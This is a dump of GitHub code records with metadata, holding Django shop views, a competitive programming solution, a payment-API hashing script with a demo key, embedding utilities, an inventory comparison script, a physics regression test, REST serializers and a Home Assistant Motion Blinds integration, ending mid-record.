Category.objects.get(id=category_id)\n\n sub_categories = category.subcategory_set.all()\n random_sub_categories = random.sample(list(sub_categories), 3)\n\n product_list_by_category = []\n for sub_category in random_sub_categories:\n two_products = sub_category.product_set.all().order_by('-stock')[:2]\n for product in two_products:\n product_info = {\n 'product_id' : product.id,\n \"name\" : product.name,\n \"image_url\" : product.image_url,\n \"price\" : product.price,\n \"discount_rate\": product.discountrate_set.get(product_id=product.id).discount_rate \n if DiscountRate.objects.filter(product=product).exists() \n else None\n } \n \n product_list_by_category.append(product_info)\n\n return JsonResponse({\"product_list_by_category\": product_list_by_category}, status=200)\n\n\nclass DetailProductView(View):\n def get(self, request, product_id):\n \n exist_product = Product.objects.filter(id=product_id).exists()\n if not exist_product:\n return JsonResponse({'message': 'PRODUCT_DOES_NOT_EXIST'}, status=400)\n\n product = Product.objects.get(id=product_id)\n \n have_discount = DiscountRate.objects.filter(product=product).exists()\n if have_discount:\n discount = DiscountRate.objects.get(product=product)\n discount_rate = discount.discount_rate\n else:\n discount_rate = None\n \n info = {\n 'id': product_id,\n 'name': product.name,\n 'description': product.description,\n 'image_url': product.image_url,\n 'price': product.price,\n 'stock': product.stock,\n 'content': product.content,\n 'uploaded_at': product.uploaded_at,\n 'sales_unit': product.sales_unit if product.sales_unit else [],\n 'amount': product.amount if product.amount else [],\n 'origin': product.origin if product.origin else [],\n 'storage_method': product.storage_method.name if product.storage_method else [],\n 'expiration_date': product.expiration_date if product.expiration_date else [],\n 'discount_rate': discount_rate\n }\n\n sub_category = Product.objects.get(id=product_id).sub_category\n products = Product.objects.filter(sub_category=sub_category)\n random_products = random.sample(list(products), 3)\n related_products = [{'id': product.id,\n 'name': product.name,\n 'image_url': product.image_url,\n 'price': product.price\n } for product in random_products]\n\n return JsonResponse({'info': info, 'related_products': related_products}, status=200)\n", "repo_name": "wecode-bootcamp-korea/18-1st-MarketHoly-backend", "sub_path": "product/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.views.View", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 15, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 16, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 18, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 19, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects.filter", "line_number": 28, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.DiscountRate", "line_number": 28, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 36, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 39, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 43, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 59, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Product.objects.all", "line_number": 61, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 61, "usage_type": "name"}, {"api_name": "models.DiscountRate.objects.filter", "line_number": 70, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "models.DiscountRate", "line_number": 70, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 74, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 77, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 79, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 79, "usage_type": "name"}, {"api_name": "models.SubCategory.objects.filter", "line_number": 89, "usage_type": "call"}, {"api_name": "models.SubCategory.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "models.SubCategory", "line_number": 89, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 93, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 96, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 98, "usage_type": "name"}, {"api_name": "models.DailySpecialDiscount.objects.filter", "line_number": 99, "usage_type": "call"}, {"api_name": "models.DailySpecialDiscount.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "models.DailySpecialDiscount", "line_number": 99, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 111, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 115, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 121, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 121, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 121, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 124, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects.filter", "line_number": 136, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects", "line_number": 136, "usage_type": "attribute"}, {"api_name": "models.DiscountRate", "line_number": 136, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 142, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 145, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 148, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 148, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 148, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 150, "usage_type": "call"}, {"api_name": "models.Product.objects.get", "line_number": 152, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 152, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 152, "usage_type": "name"}, {"api_name": "models.DiscountRate.objects.filter", "line_number": 154, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "models.DiscountRate", "line_number": 154, "usage_type": "name"}, {"api_name": "models.DiscountRate.objects.get", "line_number": 156, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "models.DiscountRate", "line_number": 156, "usage_type": "name"}, {"api_name": "models.Product.objects.get", "line_number": 178, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 178, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 178, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 179, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 179, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 179, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 180, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "38533775245", "text": "##########################################\nimport io\nimport sys\n\n_INPUT = \"\"\"\\\n6\n2 4 4 9 4 9\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n##########################################\nN = int(input())\nAlist = list(map(int,input().split()))\n\nl,r,x = 0,0,0\n#Alist.append(1)\nnum = sorted(list(set(Alist)))\n\nmaxsum = -10*15\nfor i in range(len(num)):\n temp=0\n for j in range(len(Alist)):\n if num[i]<=Alist[j]:\n temp+=num[i]\n maxsum=max(temp,maxsum)\n else:\n temp=0\nprint (maxsum)\n", "repo_name": "caffein1371/tomidori", "sub_path": "ABC189C.py", "file_name": "ABC189C.py", "file_ext": "py", "file_size_in_byte": 486, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.stdin", "line_number": 10, "usage_type": "attribute"}, {"api_name": "io.StringIO", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "28654427449", "text": "import requests\r\n#Import libraries\r\nimport hashlib\r\nimport hmac\r\nimport json\r\n\r\npayload = {\r\n \"live\": 0,\r\n \"oid\": \"112\",\r\n \"inv\": \"112020102292999\",\r\n \"ttl\": 900,\r\n \"tel\": \"256712375678\",\r\n \"eml\": \"kajuej@gmailo.com\",\r\n \"vid\": \"demo\",\r\n \"curr\": \"KES\",\r\n \"p1\": \"airtel\",\r\n \"p2\": \"020102292999\",\r\n \"p3\": \"\",\r\n \"p4\": \"900\",\r\n \"cbk\": \"https://\",\r\n \"cst\": 1,\r\n \"crl\": 2,\r\n}\r\n\r\nres = ''.join(str(val) for key, val in payload.items())\r\npayload = bytes(res, encoding='utf-8')\r\nprint(payload)\r\n\r\nkey = b'demoCHANGED'\r\nmy_hmac = hmac.new(key, payload, hashlib.sha1).hexdigest()\r\n\r\npayload = {\r\n \"live\": 0,\r\n \"oid\": \"112\",\r\n \"inv\": \"112020102292999\",\r\n \"ttl\": 900,\r\n \"tel\": \"256712375678\",\r\n \"eml\": \"kajuej@gmailo.com\",\r\n \"vid\": \"demo\",\r\n \"curr\": \"KES\",\r\n \"p1\": \"airtel\",\r\n \"p2\": \"020102292999\",\r\n \"p3\": \"\",\r\n \"p4\": \"900\",\r\n \"cbk\": \"https://\",\r\n \"cst\": 1,\r\n \"crl\": 2,\r\n \"hsh\": my_hmac\r\n}\r\n\r\n\r\nresponse = requests.post('https://payments.ipayafrica.com/v3/ke', data=payload)\r\nprint(response.text)", "repo_name": "waruingugi/web_app_test", "sub_path": "hash4.py", "file_name": "hash4.py", "file_ext": "py", "file_size_in_byte": 1076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "hmac.new", "line_number": 30, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 30, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "8401576070", "text": "import numpy as np\nfrom scipy import spatial\nfrom sklearn.manifold import TSNE\nfrom sklearn.decomposition import PCA\n\n# Internal imports\nfrom mip_dmp.utils.io import load_glove_model, load_c2v_model\n\n\ndef glove_embedding(text, glove_model):\n \"\"\"Find the Glove embedding for the text.\n\n Parameters\n ----------\n text : str\n Text to be embedded.\n\n glove_model : str\n Glove model to be used, loaded by the gensim library.\n\n Returns\n -------\n numpy.ndarray\n Glove embedding for the text.\n \"\"\"\n\n def preprocess_text(text):\n \"\"\"Preprocess the text.\n\n Parameters\n ----------\n text : str\n Text to be preprocessed.\n\n Returns\n -------\n str\n Preprocessed text.\n \"\"\"\n # Lowercase the text.\n text = text.lower()\n # Tokenize the text.\n text = [s for s in text if s != \"\" and s != \"_\"] # Make a list of characters.\n return text\n\n # Preprocess the text.\n text = preprocess_text(text)\n # Find the Glove embedding for the text.\n embedding = np.sum(np.array([glove_model[i] for i in text]), axis=0)\n return embedding\n\n\ndef chars2vec_embedding(text, chars2vec_model):\n \"\"\"Find the chars2vec embedding for the text.\n\n Parameters\n ----------\n text : str\n Text to be embedded.\n\n chars2vec_model : str\n chars2vec model to be used, loaded by the gensim library.\n\n Returns\n -------\n numpy.ndarray\n chars2vec embedding for the text.\n \"\"\"\n # Find the chars2vec embedding for the text.\n # The chars2vec model expects a list of strings as input.\n # The output is a list of embeddings, so we take the first element.\n embedding = chars2vec_model.vectorize_words([text])[0]\n return embedding\n\n\ndef embedding_similarity(x_embedding, y_embedding):\n \"\"\"Find the matches based on chars2vec embeddings and cosine similarity.\n\n Parameters\n ----------\n x_embedding : str\n String to compare against.\n\n y_embedding : str\n String to compare.\n\n chars2vec_model : str\n chars2vec model to be used, loaded by the gensim library.\n\n Returns\n -------\n float\n Cosine similarity between the two chars2vec embeddings of the strings.\n \"\"\"\n return spatial.distance.cosine(x_embedding, y_embedding)\n\n\ndef generate_embeddings(words: list, embedding_method: str = \"chars2vec\"):\n \"\"\"Generate embeddings for a list of words.\n\n Parameters\n ----------\n words : list\n List of words to generate embeddings for.\n\n embedding_method : str\n Embedding method to be used, either \"chars2vec\" or \"glove\".\n\n Returns\n -------\n list\n List of embeddings for the words.\n \"\"\"\n print(f\"> Generating embeddings for {len(words)} words...\")\n if embedding_method == \"chars2vec\":\n c2v_model = load_c2v_model()\n embeddings = [chars2vec_embedding(word, c2v_model) for word in words]\n elif embedding_method == \"glove\":\n glove_model = load_glove_model()\n embeddings = [glove_embedding(word, glove_model) for word in words]\n else:\n embeddings = None\n return embeddings\n\n\ndef find_n_closest_embeddings(\n word_embedding: np.array, embeddings: list, embedding_words: list, n: int = 5\n):\n \"\"\"Find the n closest embeddings to the given embedding.\n\n Parameters\n ----------\n word_embedding : numpy.ndarray\n Embedding to find the n closest embeddings to.\n\n embeddings : list\n List of embeddings to find the closest embeddings to the given embedding in.\n\n embedding_words : list\n List of words corresponding to the embeddings that will be resorted and reduced accordingly.\n\n n : int\n Number of closest embeddings to find.\n\n Returns\n -------\n dict\n Dictionary containing the n closest embeddings, their distances to the given embedding,\n and the words corresponding to the embeddings in the form::\n\n {\n \"distances\": [float],\n \"embeddings\": [numpy.ndarray],\n \"embedding_words\": [str]\n }\n \"\"\"\n distances = np.array(\n [spatial.distance.cosine(word_embedding, embedding) for embedding in embeddings]\n ).astype(np.float32)\n sorted_indices = np.argsort(distances)\n return dict(\n {\n \"distances\": [distances[i] for i in sorted_indices[0:n]],\n \"embeddings\": [embeddings[i] for i in sorted_indices[0:n]],\n \"embedding_words\": [embedding_words[i] for i in sorted_indices[0:n]],\n }\n )\n\n\ndef reduce_embeddings_dimension(\n embeddings: list, reduce_method: str = \"tsne\", n_components: int = 3\n):\n \"\"\"Reduce the dimension of the embeddings, mainly for visualization purposes.\n\n Parameters\n ----------\n embeddings : list\n List of embeddings to reduce the dimension of.\n\n reduce_method : str\n Method to use to reduce the dimension, either \"tsne\" or \"pca\".\n\n n_components : int\n Number of components to reduce the dimension to.\n\n Returns\n -------\n list\n List of reduced embeddings.\n \"\"\"\n print(\n f\"> Reducing embeddings dimensionality to {n_components} using {reduce_method}...\"\n )\n if reduce_method == \"tsne\":\n tsne_model = TSNE(\n perplexity=40,\n n_components=n_components,\n init=\"pca\",\n n_iter=2500,\n random_state=42,\n )\n reduction_values = tsne_model.fit_transform(np.array(embeddings))\n elif reduce_method == \"pca\":\n pca_model = PCA(n_components=n_components, random_state=42)\n reduction_values = pca_model.fit_transform(np.array(embeddings))\n else:\n print(f\"ERROR: Invalid reduction method ({reduce_method})!\")\n reduction_values = None\n return (\n reduction_values[:, 0],\n reduction_values[:, 1],\n reduction_values[:, 2],\n )\n", "repo_name": "HBPMedical/mip-dmp", "sub_path": "mip_dmp/process/embedding.py", "file_name": "embedding.py", "file_ext": "py", "file_size_in_byte": 5939, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.sum", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 95, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 95, "usage_type": "attribute"}, {"api_name": "scipy.spatial", "line_number": 95, "usage_type": "name"}, {"api_name": "mip_dmp.utils.io.load_c2v_model", "line_number": 116, "usage_type": "call"}, {"api_name": "mip_dmp.utils.io.load_glove_model", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 157, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 158, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 158, "usage_type": "attribute"}, {"api_name": "scipy.spatial", "line_number": 158, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 205, "usage_type": "call"}]} +{"seq_id": "41776118331", "text": "import pyodbc\nimport sqlite3\nimport pandas as pd\n\nconn = sqlite3.connect(\"DB_compare.db\")\ncursor = conn.cursor()\n\n# definig fucntion for counting rows\ndef row_count(querry):\n cursor.execute('{}'.format(querry))\n count_val = cursor.fetchone()[0]\n conn.commit()\n return count_val\n\n# defining simple querries\ndef panda_querry(querry):\n sql = pd.read_sql('{}'.format(querry),conn)\n return sql\n\n# out of stock products count in both databases\nout_of_stock_woo = row_count('SELECT count(Nazwa) FROM prod_woo WHERE Status = \\'outofstock\\'')\nout_of_stock_sub = row_count('SELECT count(Nazwa) FROM prod_subiekt Where prod_subiekt.Stan < prod_subiekt.Stan_Minimalny')\n\n# products with low stock locally -> should be out of stock online\ndf_low_stock = panda_querry(\"\"\"\nSELECT prod_woo.Nazwa, prod_woo.Symbol, prod_woo.Stan as Stan_Woo, prod_subiekt.Stan as Stan_Sub \nFROM prod_woo join prod_subiekt ON prod_woo.Symbol = prod_subiekt.Symbol\nWHERE prod_subiekt.Stan < prod_woo.Stan\nAND prod_woo.Status != 'outofstock';\n\"\"\")\n# products with high stock locally -> should be in stock online\ndf_low_stock_woo = panda_querry(\"\"\"\nSELECT prod_woo.Nazwa, prod_woo.Symbol, prod_woo.Stan as Stan_Woo, prod_subiekt.Stan as Stan_Sub \nFROM prod_woo join prod_subiekt ON prod_woo.Symbol = prod_subiekt.Symbol\nWHERE prod_subiekt.Stan > prod_woo.Stan\nAND prod_woo.Status = 'outofstock';\n\"\"\")\n\n# checking if the out of stock match\nif df_low_stock_woo.empty:\n print('Subiekt low stock products CHECKED')\nelse:\n print('Woo Database out of stock products: {}'.format(out_of_stock_woo))\n print('Subiekt Database out of stock products: {}'.format(out_of_stock_sub))\n print('Higher stock locally')\n print('Check those products: ','\\n', df_low_stock_woo)\n\nif df_low_stock.empty:\n print('\\n''Woo low stock products CHECKED')\nelse:\n print('\\n''Woo Database out of stock products: {}'.format(out_of_stock_woo))\n print('Subiekt Database out of stock products: {}'.format(out_of_stock_sub))\n print('Low stock locally')\n print('Check those products online: ', '\\n', df_low_stock)\n\n# counting all rows in both tables \nrow_count_woo = row_count('SELECT COUNT(Nazwa) FROM prod_woo')\nrow_count_sub = row_count('SELECT COUNT(Nazwa) FROM prod_subiekt')\n\n# looking for products with no match in the Woo database\ndf_diff_stock = panda_querry(\"\"\"\nSELECT prod_woo.Symbol, prod_subiekt.Symbol as Symbol_Sub, prod_woo.Nazwa , prod_woo.Stan as Stan_Online, \nprod_subiekt.Stan as Stan_Local FROM prod_woo\nLEFT JOIN prod_subiekt ON prod_woo.Symbol = prod_subiekt.Symbol\nWHERE prod_subiekt.Symbol is NULL\nORDER BY prod_woo.Nazwa\n\"\"\",)\n# checking for differences of overall number of products\nif row_count_sub != row_count_woo:\n print('\\n''The number of products in Databases does NOT match')\n print('Woo Database products count: {}'.format(row_count_woo))\n print('Subiekt Database products count: {}'.format(row_count_sub))\n print('Check those products:','\\n', df_diff_stock)\n print('Also check newly added products in Woo Store')\nelse:\n print('\\n''Overall number of products MATCH')\n\n# checking if number of out of stock match\nif out_of_stock_woo == out_of_stock_sub:\n print('\\n''Quantity differences CHECKED')\nelse:\n print('Run the SKU_Check to check symbols')\n\ncursor.close()\nconn.close()", "repo_name": "dredd85/Subiekt_Woocommerce", "sub_path": "3.Qty_Check.py", "file_name": "3.Qty_Check.py", "file_ext": "py", "file_size_in_byte": 3304, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlite3.connect", "line_number": 5, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "10454699648", "text": "# regression test for time dependent H2 chemistry\n\n# Modules\nimport os\nimport athena_read # utilities for reading Athena++ data\nimport logging\nimport numpy as np # standard Python module for numerics\nimport sys # standard Python module to change path\nimport scripts.utils.athena as athena # utilities for running Athena++\nsys.path.insert(0, '../../vis/python') # insert path to Python read scripts\nlogger = logging.getLogger('athena' + __name__[7:]) # set logger name based on module\n\n\ndef prepare(**kwargs):\n try:\n if os.environ['CXX']:\n cxx = os.environ['CXX']\n else:\n cxx = 'g++'\n except KeyError:\n cxx = 'g++'\n athena.configure(\n prob='chem_uniform',\n chemistry='H2',\n cxx=cxx,\n eos='isothermal',\n cvode_path=os.environ['CVODE_PATH']\n )\n athena.make()\n\n\ndef run(**kwargs):\n arguments = [\n 'chemistry/output_zone_sec=0',\n ]\n athena.run('chemistry/athinput.chem_H2', arguments)\n\n\ndef analyze():\n def get_H(t_code, unit_length_in_cm=3.085678e+18, unit_vel_in_cms=1.0e5,\n f_H_0=1., n=100., xi_cr=2.0e-16, k_gr=3.0e-17):\n \"\"\"theoretical abundance of atomic hydrogen over time.\n input:\n t_code: time in code units, float or array\n optional parameters:\n unit_length_in_cm: code units of length, default 1pc\n unit_vel_in_cms: code units of velocity, default 1km/s\n f_H_0: initial atomic hydrogen abundance, default 0.\n n: density in cm-3, default 100\n xi_cr: primary cosmic-ray ionization rate in s-1H-1, default 2.0e-16\n k_gr: grain surface recombination rate of H2, default 3.0e-17.\n output:\n H abundance, float or array, between 0. and 1.\"\"\"\n k_cr = xi_cr * 3.\n a1 = k_cr + 2.*n*k_gr\n a2 = k_cr\n t = t_code * (unit_length_in_cm / unit_vel_in_cms)\n f_H = (f_H_0 - a2/a1)*np.exp(-t*a1) + a2/a1\n return f_H\n\n # maximum error allowed\n err_control = 1.0e-4\n # athena++ output\n fn_hst = \"bin/chem_H2.hst\"\n data_hst = athena_read.hst(fn_hst)\n # theoretical abundances\n f_H = get_H(data_hst[\"time\"], n=100.)\n\n diff = f_H - data_hst[\"H\"]/data_hst[\"mass\"]\n err_max = abs(diff/f_H).max()\n print(\"err_max={:.2e}\".format(err_max))\n\n if err_max < err_control:\n return True\n else:\n return False\n", "repo_name": "doraemonho/Athena_UNM", "sub_path": "tst/regression/scripts/tests/chemistry/chem_H2.py", "file_name": "chem_H2.py", "file_ext": "py", "file_size_in_byte": 2538, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.insert", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 17, "usage_type": "attribute"}, {"api_name": "scripts.utils.athena.configure", "line_number": 22, "usage_type": "call"}, {"api_name": "scripts.utils.athena", "line_number": 22, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 27, "usage_type": "attribute"}, {"api_name": "scripts.utils.athena.make", "line_number": 29, "usage_type": "call"}, {"api_name": "scripts.utils.athena", "line_number": 29, "usage_type": "name"}, {"api_name": "scripts.utils.athena.run", "line_number": 36, "usage_type": "call"}, {"api_name": "scripts.utils.athena", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 58, "usage_type": "call"}, {"api_name": "athena_read.hst", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "2086015588", "text": "from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\nfrom project.models import *\nfrom rest_framework.exceptions import APIException\nfrom partners.models import *\n\n\nclass ProjectDetailsSerializer(ModelSerializer):\n created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())\n class Meta:\n model=ProjectDetails\n fields='__all__'\n\nclass AddProjectVentureSerializer(ModelSerializer):\n patners = serializers.ListField(required=False)\n class Meta:\n model=ProjectDetails\n fields=['id','venture','patners']\n\n def update(self, instance, validated_data):\n try:\n patners = validated_data.pop('patners')\n instance.venture = validated_data.get('venture', instance.venture)\n project_id = instance.id\n instance.save()\n if validated_data.get('venture') and patners:\n for jv in patners:\n partner_percentage = jv.pop('partner_percentage')\n partner_details = PartnerDetails.objects.get_or_create(**jv)\n print('partner_details:', partner_details)\n JointVenture.objects.get_or_create(partner = partner_details[0],\n project_id = project_id,\n partner_percentage=partner_percentage)\n return instance\n except Exception as error:\n raise APIException({\n 'msg': error,\n 'success': 0\n })", "repo_name": "MilonChowdhury/shyam_infra", "sub_path": "project/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 1579, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 8, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HiddenField", "line_number": 9, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 9, "usage_type": "name"}, {"api_name": "rest_framework.serializers.CurrentUserDefault", "line_number": 9, "usage_type": "call"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 14, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ListField", "line_number": 15, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 15, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.APIException", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "37562443060", "text": "\"\"\"The motion_blinds component.\"\"\"\nimport asyncio\nfrom datetime import timedelta\nimport logging\nfrom socket import timeout\n\nfrom motionblinds import MotionMulticast\n\nfrom homeassistant import config_entries, core\nfrom homeassistant.const import CONF_API_KEY, CONF_HOST, EVENT_HOMEASSISTANT_STOP\nfrom homeassistant.exceptions import ConfigEntryNotReady\nfrom homeassistant.helpers import device_registry as dr\nfrom homeassistant.helpers.update_coordinator import DataUpdateCoordinator\n\nfrom .const import (\n DOMAIN,\n KEY_COORDINATOR,\n KEY_GATEWAY,\n KEY_MULTICAST_LISTENER,\n MANUFACTURER,\n MOTION_PLATFORMS,\n)\nfrom .gateway import ConnectMotionGateway\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef setup(hass: core.HomeAssistant, config: dict):\n \"\"\"Set up the Motion Blinds component.\"\"\"\n return True\n\n\nasync def async_setup_entry(\n hass: core.HomeAssistant, entry: config_entries.ConfigEntry\n):\n \"\"\"Set up the motion_blinds components from a config entry.\"\"\"\n hass.data.setdefault(DOMAIN, {})\n host = entry.data[CONF_HOST]\n key = entry.data[CONF_API_KEY]\n\n # Create multicast Listener\n if KEY_MULTICAST_LISTENER not in hass.data[DOMAIN]:\n multicast = MotionMulticast()\n hass.data[DOMAIN][KEY_MULTICAST_LISTENER] = multicast\n # start listening for local pushes (only once)\n await hass.async_add_executor_job(multicast.Start_listen)\n\n # register stop callback to shutdown listening for local pushes\n def stop_motion_multicast(event):\n \"\"\"Stop multicast thread.\"\"\"\n _LOGGER.debug(\"Shutting down Motion Listener\")\n multicast.Stop_listen()\n\n hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_motion_multicast)\n\n # Connect to motion gateway\n multicast = hass.data[DOMAIN][KEY_MULTICAST_LISTENER]\n connect_gateway_class = ConnectMotionGateway(hass, multicast)\n if not await connect_gateway_class.async_connect_gateway(host, key):\n raise ConfigEntryNotReady\n motion_gateway = connect_gateway_class.gateway_device\n\n def update_gateway():\n \"\"\"Call all updates using one async_add_executor_job.\"\"\"\n motion_gateway.Update()\n for blind in motion_gateway.device_list.values():\n try:\n blind.Update()\n except timeout:\n # let the error be logged and handled by the motionblinds library\n pass\n\n async def async_update_data():\n \"\"\"Fetch data from the gateway and blinds.\"\"\"\n try:\n await hass.async_add_executor_job(update_gateway)\n except timeout:\n # let the error be logged and handled by the motionblinds library\n pass\n\n coordinator = DataUpdateCoordinator(\n hass,\n _LOGGER,\n # Name of the data. For logging purposes.\n name=entry.title,\n update_method=async_update_data,\n # Polling interval. Will only be polled if there are subscribers.\n update_interval=timedelta(seconds=600),\n )\n\n # Fetch initial data so we have data when entities subscribe\n await coordinator.async_refresh()\n\n hass.data[DOMAIN][entry.entry_id] = {\n KEY_GATEWAY: motion_gateway,\n KEY_COORDINATOR: coordinator,\n }\n\n device_registry = await dr.async_get_registry(hass)\n device_registry.async_get_or_create(\n config_entry_id=entry.entry_id,\n connections={(dr.CONNECTION_NETWORK_MAC, motion_gateway.mac)},\n identifiers={(DOMAIN, entry.unique_id)},\n manufacturer=MANUFACTURER,\n name=entry.title,\n model=\"Wi-Fi bridge\",\n sw_version=motion_gateway.protocol,\n )\n\n for component in MOTION_PLATFORMS:\n hass.async_create_task(\n hass.config_entries.async_forward_entry_setup(entry, component)\n )\n\n return True\n\n\nasync def async_unload_entry(\n hass: core.HomeAssistant, config_entry: config_entries.ConfigEntry\n):\n \"\"\"Unload a config entry.\"\"\"\n unload_ok = all(\n await asyncio.gather(\n *[\n hass.config_entries.async_forward_entry_unload(config_entry, component)\n for component in MOTION_PLATFORMS\n ]\n )\n )\n\n if unload_ok:\n hass.data[DOMAIN].pop(config_entry.entry_id)\n\n if len(hass.data[DOMAIN]) == 1:\n # No motion gateways left, stop Motion multicast\n _LOGGER.debug(\"Shutting down Motion Listener\")\n multicast = hass.data[DOMAIN].pop(KEY_MULTICAST_LISTENER)\n await hass.async_add_executor_job(multicast.Stop_listen)\n\n return unload_ok\n", "repo_name": "fpetillo/home-assistant", "sub_path": "homeassistant/components/motion_blinds/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 4571, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 25, "usage_type": 